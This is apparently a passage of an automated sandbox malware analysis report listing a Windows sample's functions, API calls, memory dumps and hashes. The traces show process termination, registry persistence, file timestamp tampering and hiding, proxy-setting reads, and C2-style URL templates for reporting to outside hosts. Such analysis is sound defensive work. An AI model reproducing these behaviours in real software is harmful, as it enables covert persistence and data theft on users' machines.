                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 00401D62
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleInternet$closesocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 100882886-0
                                                                                                                                                                                                              • Opcode ID: b7f9b6983554d85f1a8aab1ab593689c95d43d7b1e444df01979bc57f6b5053e
                                                                                                                                                                                                              • Instruction ID: 73937d086646344abc5379455c301a867b7dd6fe10e46ef3d999f35736dc2ecf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7f9b6983554d85f1a8aab1ab593689c95d43d7b1e444df01979bc57f6b5053e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09E0EC719101049BC7013B78AE4EA153F74AF0530AF098075E9066A1BBE67A993CA69A
                                                                                                                                                                                                              Function 00401CC1 Relevance: 1.5, APIs: 1, Instructions: 40registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00411009,00000004,?,00405F35), ref: 00401D25
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                              • Opcode ID: cb3a058cf70e81167843520c46fb0466aa5eec9e791d9ce5bf6ab9d735437fae
                                                                                                                                                                                                              • Instruction ID: 52816088567a2a1d922fdabb556b33062536571a2cef852fce66200631c346e0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb3a058cf70e81167843520c46fb0466aa5eec9e791d9ce5bf6ab9d735437fae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36F0E9B174030417F7305518EC81B7B7799EFD436AF10503AFB09967D0E1795C5986AE

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 004016E1 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 144registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,0040228C), ref: 00401720
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 00401751
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 0040177F
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings,?,?,?,?,?,?,?,00001000,00000000,?), ref: 00401795
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,ProxyEnable,00000000,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 004017D2
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,Connections,00000000,00020019,?,?,?,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 00401817
                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,00001000), ref: 0040189E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004018BD
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 004018CF
                                                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(80000003,?,?,00001000), ref: 004018E8
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 004018FF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, xrefs: 00401716
                                                                                                                                                                                                              • Connections, xrefs: 0040180B
                                                                                                                                                                                                              • _Classes, xrefs: 00401762
                                                                                                                                                                                                              • ProxyEnable, xrefs: 004017C6
                                                                                                                                                                                                              • \Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00401779
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$EnumOpenValue$CreateQuerylstrcatlstrlen
                                                                                                                                                                                                              • String ID: Connections$ProxyEnable$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections$\Software\Microsoft\Windows\CurrentVersion\Internet Settings$_Classes
                                                                                                                                                                                                              • API String ID: 1447802672-1466506419
                                                                                                                                                                                                              • Opcode ID: 808dc75fde213c51738dab8c61e00dc01c436320e1f715c5742faa912a255552
                                                                                                                                                                                                              • Instruction ID: 66e194334fdec41dc41c183a83ee0e0423d2cbbda799cea80f6bf4481fa86f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 808dc75fde213c51738dab8c61e00dc01c436320e1f715c5742faa912a255552
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2941EEB2904344AAF73176219C0AF9B7B9C9B44348F14443FFE88B51D3E279962CC667
                                                                                                                                                                                                              Function 0040151E Relevance: 15.1, APIs: 10, Instructions: 92fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004049C8,?,00000100,?,?,00000104), ref: 00401549
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,00000100,?,?,00000104), ref: 0040156D
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00401588
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00001000,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004015F1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401601
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401607
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 0040160D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandle$AttributesDeleteRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3513576528-0
                                                                                                                                                                                                              • Opcode ID: 41ed5e2b111f1504c4f2cfafdd4510ffd4951226a2c659f90d2f2fbe674caf25
                                                                                                                                                                                                              • Instruction ID: ead9107263b76718dec6335517b8b67c7343bef8d8983c19364d90e74fa0285a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41ed5e2b111f1504c4f2cfafdd4510ffd4951226a2c659f90d2f2fbe674caf25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8021A1B1A802007AE53031757C03F5B369C8B84758F190A3BFE06B91D6F5BDE62941AF
                                                                                                                                                                                                              Function 004024CE Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 123stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wsprintf$lstrcpylstrlen
                                                                                                                                                                                                              • String ID: %02X$http://%s.biz/d/G?$p!A
                                                                                                                                                                                                              • API String ID: 1876335253-3368850760
                                                                                                                                                                                                              • Opcode ID: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                                                              • Instruction ID: 2cea46374afef77fdc915a1e9f7db235c3865f046913e12eac0c1d1ce8585de9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F410331C002189BDB11EF68CD8979EBBF5BF40308F150176E815BB2D2D3B9A919C799
                                                                                                                                                                                                              Function 0040350B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24registrysleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003), ref: 00403526
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,?,00000012), ref: 00403543
                                                                                                                                                                                                              • Sleep.KERNEL32(00001388,00000012), ref: 00403550
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$Sleep
                                                                                                                                                                                                              • String ID: Default Flags
                                                                                                                                                                                                              • API String ID: 3593280086-1793642065
                                                                                                                                                                                                              • Opcode ID: 21d0f87f3dbcf3fc67c84d5afca7e09b8c8d69fca2a39a5828c1e487fc111c3c
                                                                                                                                                                                                              • Instruction ID: c183a8bf8b1eb437f9bd20ceed0a90573d3401291b8ece137b7e57e0eade4e67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21d0f87f3dbcf3fc67c84d5afca7e09b8c8d69fca2a39a5828c1e487fc111c3c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68E04F71A8030472D7712639AE4BF477A3467A1B09F11007BB906398C7A5B51329D9AA
                                                                                                                                                                                                              Function 00402471 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004024A3
                                                                                                                                                                                                                • Part of subcall function 00402030: lstrcpyA.KERNEL32(?,?), ref: 00402065
                                                                                                                                                                                                                • Part of subcall function 00402030: lstrlenA.KERNEL32(00000000,?), ref: 0040206E
                                                                                                                                                                                                                • Part of subcall function 00402030: htons.WS2_32(00000000), ref: 004020C9
                                                                                                                                                                                                                • Part of subcall function 00402030: socket.WS2_32(00000002,00000001,00000006), ref: 0040213E
                                                                                                                                                                                                                • Part of subcall function 00402030: closesocket.WS2_32(00000000), ref: 00402169
                                                                                                                                                                                                                • Part of subcall function 00402030: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 0040229C
                                                                                                                                                                                                                • Part of subcall function 00402030: InternetSetOptionA.WININET(00000000,00000002,00009C40,00000004), ref: 004022BF
                                                                                                                                                                                                                • Part of subcall function 00402030: InternetSetOptionA.WININET(00000000,00000006,00009C40,00000004), ref: 004022CB
                                                                                                                                                                                                                • Part of subcall function 00402030: InternetSetOptionA.WININET(00000000,00000005,00009C40,00000004), ref: 004022D7
                                                                                                                                                                                                                • Part of subcall function 00401D38: InternetCloseHandle.WININET(?), ref: 00401D49
                                                                                                                                                                                                                • Part of subcall function 00401D38: InternetCloseHandle.WININET(00000000), ref: 00401D51
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$Option$CloseHandle$Openclosesockethtonslstrcpylstrlensocketwsprintf
                                                                                                                                                                                                              • String ID: 12@$http://%s/d/rpt?%s$urlinj_creat
                                                                                                                                                                                                              • API String ID: 2941392982-2858504077
                                                                                                                                                                                                              • Opcode ID: f9e1d899c8cb631e133cdf2d4e1ab3e6813410de5d1cdf2efe6631ca7b0b0578
                                                                                                                                                                                                              • Instruction ID: 88ec9d7906897b8114724b1b79faff9a7f04a0d329b8cb3f5de5d04a505f717c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9e1d899c8cb631e133cdf2d4e1ab3e6813410de5d1cdf2efe6631ca7b0b0578
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECE06DB160525017E310B669AC86BDB268C9B44388F50453EBB49B32C6E9BDAC4086AA

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00403A19 Relevance: 533.2, APIs: 282, Strings: 21, Instructions: 2982registrystringfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32 ref: 00403A27
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(004120D0), ref: 00403A43
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00403A74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00407014), ref: 00403AA2
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403ACC
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(00000104), ref: 00403AD4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00403AF2
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00403B09
                                                                                                                                                                                                              • Process32First.KERNEL32(?,?), ref: 00403B32
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,?), ref: 00403B6A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 00403B7B
                                                                                                                                                                                                              • Process32Next.KERNEL32(?,?), ref: 00403B94
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403BAC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,000000FF), ref: 00403BB5
                                                                                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00403BC2
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403BE9
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 00403BF6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,0040702B), ref: 00403C23
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(0040703E,?,?,?,?,?,?,?,00000104), ref: 00403C86
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00407048), ref: 00403C96
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00407060), ref: 00403CA6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00407075), ref: 00403CB6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00407086), ref: 00403CC6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00407099), ref: 00403D13
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,004070AC), ref: 00403D2E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00403E2B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,004070C4), ref: 00403E50
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000104), ref: 00403E7F
                                                                                                                                                                                                              • WSAStartup.WS2_32(00000002,?), ref: 00403E97
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403E9F
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00000104), ref: 00403EA6
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00403EAD
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(004070D7,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00403EDA
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,004070E4), ref: 00403F01
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(004070F8), ref: 00403F34
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00407105), ref: 00403F5B
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(004071C0), ref: 00403FD9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,004071CC), ref: 00404042
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,004071DA), ref: 00404052
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,004071EB), ref: 00404062
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,004071FC), ref: 00404072
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,0040720F), ref: 00404082
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404347
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000), ref: 00404366
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404386
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404392
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,007D0BC0), ref: 0040445F
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004044BC
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(0040F4FC,00000001,0040F48A,?,?,?,?,?,?,?,?,00000000), ref: 004044D0
                                                                                                                                                                                                              • GetLastError.KERNEL32(0040F48A,?,?,?,?,0040F48A,?,?,?,?,?,?,?,?,00000000), ref: 004044E4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,0040F48A,?,?,?,?,0040F48A), ref: 00404506
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,0040751C,?,?,?,?,?,?,0040F48A,?,?,?,?,0040F48A), ref: 00404532
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,0040751C,?,?,?,?,?,?,0040F48A,?,?,?,?,0040F48A), ref: 0040453E
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,0040F48A,?,?,?,?,0040F48A), ref: 0040456E
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 0040458C
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,007D0BC0), ref: 004045C1
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100201,00000000,?), ref: 004045DE
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 00404603
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00404613
                                                                                                                                                                                                              • SetPriorityClass.KERNEL32(?,00000040), ref: 00404633
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00404658
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(007D0BC1,00001388), ref: 0040468F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(007D0BC1,00001388), ref: 00404698
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 004046BC
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000080), ref: 004046C5
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,0040F4A0,00000000,00020019,?,?,?,?,?,?,?,?,0040F48A), ref: 004046F4
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,0040F4A0,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040472B
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,0040F4EE,00000000,00000000,00412170,?,?,?,0040F4FC,?,00000000), ref: 00404766
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,0040F4EE,00000000,00000003,00412170,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00404790
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004047A1
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000002,0040F4A0), ref: 004047BA
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040F4FC,?,00000000), ref: 004047CC
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,0040F48A,?,?,?,?,0040F48A), ref: 004047E2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,0040F48A,?,?,?,?,0040F48A), ref: 00404804
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,0040F4A0,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000,?,?,?,0040F48A), ref: 0040484E
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,0040F4A0,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040487A
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,0040F508,00000000,00000000,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,0040F48A), ref: 004048B1
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,0040F508,00000000,00000003,004120C4,0000000C,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004048D7
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,0040F48A), ref: 004048E9
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00407347,?,00000104,?,?,?,?,?,?,?,004120C4,?,?,?,0040F4FC,?), ref: 00404906
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404925
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404954
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404963
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 00404998
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030,?,00000100,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 004049A9
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007D0BC0,?,00411030,?,00000100,?,?,00000104), ref: 004049B0
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00407351,?,?,?,?,?,?,00000104), ref: 004049E6
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007D0BC0,?,00407351,?,?,?,?,?,?,00000104), ref: 004049ED
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,00407351,?,?,?,?,?,?,00000104), ref: 004049FC
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,0040736E,?,?,?,?,?,?,?,?,?,00407351), ref: 00404A2B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007D0BC0,?,0040736E,?,?,?,?,?,?,?,?,?,00407351), ref: 00404A32
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,0040736E,?,?,?,?,?,?,?,?,?,00407351), ref: 00404A48
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404A8F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AA9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC9
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000100,00000001,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404AF2
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B1E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B27
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B3C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B48
                                                                                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00404B55
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00404B75
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000100,?,?,00000104), ref: 00404B7F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000104), ref: 00404BA5
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404BC3
